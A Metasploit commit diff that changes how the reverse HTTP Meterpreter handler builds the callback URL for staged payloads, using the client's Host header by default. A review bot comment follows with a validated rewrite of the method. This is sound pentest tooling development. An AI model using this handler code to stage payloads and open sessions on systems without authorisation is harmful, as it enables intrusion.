Lands #4912, http handlers will use the client's Host header by default.

bug/bundler_fix
HD Moore 2015-03-11 23:23:37 -05:00
commit cdef992d6b
No known key found for this signature in database
GPG Key ID: 7549FB3DB1DD1F32
1 changed files with 12 additions and 9 deletions


@ -53,6 +53,7 @@ module ReverseHttp
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]), OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptBool.new('OverrideRequestHost', [ false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false ]),
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ]) OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
], Msf::Handler::ReverseHttp) ], Msf::Handler::ReverseHttp)
end end
@ -92,13 +93,15 @@ module ReverseHttp
# addresses. # addresses.
# #
# @return [String] A URI of the form +scheme://host:port/+ # @return [String] A URI of the form +scheme://host:port/+
def payload_uri def payload_uri(req)
if ipv6? if req and req.headers and req.headers['Host'] and not datastore['OverrideRequestHost']
callback_host = "[#{datastore['LHOST']}]" callback_host = req.headers['Host']
elsif ipv6?
callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"
else else
callback_host = datastore['LHOST'] callback_host = "#{datastore['LHOST']}:#{datastore['LPORT']}"
end end
"#{scheme}://#{callback_host}:#{datastore['LPORT']}/" "#{scheme}://#{callback_host}/"
end end
# Use the {#refname} to determine whether this handler uses SSL or not # Use the {#refname} to determine whether this handler uses SSL or not
@ -186,7 +189,7 @@ protected
case uri_match case uri_match
when /^\/INITPY/ when /^\/INITPY/
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = payload_uri + conn_id + '/' url = payload_uri(req) + conn_id + '/'
blob = "" blob = ""
blob << obj.generate_stage blob << obj.generate_stage
@ -221,7 +224,7 @@ protected
when /^\/INITJM/ when /^\/INITJM/
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = payload_uri + conn_id + "/\x00" url = payload_uri(req) + conn_id + "/\x00"
blob = "" blob = ""
blob << obj.generate_stage blob << obj.generate_stage
@ -249,7 +252,7 @@ protected
when /^\/A?INITM?/ when /^\/A?INITM?/
conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16) conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
url = payload_uri + conn_id + "/\x00" url = payload_uri(req) + conn_id + "/\x00"
print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...") print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
resp['Content-Type'] = 'application/octet-stream' resp['Content-Type'] = 'application/octet-stream'
@ -294,7 +297,7 @@ protected
create_session(cli, { create_session(cli, {
:passive_dispatcher => obj.service, :passive_dispatcher => obj.service,
:conn_id => conn_id, :conn_id => conn_id,
:url => payload_uri + conn_id + "/\x00", :url => payload_uri(req) + conn_id + "/\x00",
:expiration => datastore['SessionExpirationTimeout'].to_i, :expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i, :comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:ssl => ssl?, :ssl => ssl?,
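Review bot: In the `payload_uri(req)` hunk the client-supplied Host header is copied verbatim into the callback URL that is then baked into the stage and stored as the session `:url`, with no validation at all — and since `OverrideRequestHost` defaults to `false`, this is the default path. Any value a client (or an intermediary that rewrites Host) sends is accepted, including an empty string (truthy in Ruby, yielding `scheme:///`) or one containing `/`, whitespace or other non-authority characters, which would corrupt the URL or point the stage at a host the operator does not control; the check should accept only a plain `host[:port]` token and otherwise fall back to `LHOST:LPORT`. The condition also uses `and`/`not`, which RuboCop flags in favour of `&&`/`!`, and the YARD block above the method still lacks a `@param req` entry describing that the Host header is consulted. Whether a Host without an explicit port always implies the handler's own scheme/port (e.g. behind a TLS-terminating proxy) is not visible here and is worth confirming.

```ruby
# @param req [#headers, nil] the incoming staging request; its Host header, when present and
#   well-formed, is used as the callback host unless OverrideRequestHost is set
def payload_uri(req)
  host = req.headers['Host'] if req && req.headers
  # Host is attacker-controllable input; accept only a bare host[:port] token so a
  # malformed or hostile value cannot inject path/authority characters into the URL.
  if host && !datastore['OverrideRequestHost'] && host =~ /\A[a-zA-Z0-9.\-\[\]:]+\z/
    callback_host = host
  elsif ipv6?
    callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"
  else
    callback_host = "#{datastore['LHOST']}:#{datastore['LPORT']}"
  end
  "#{scheme}://#{callback_host}/"
end
```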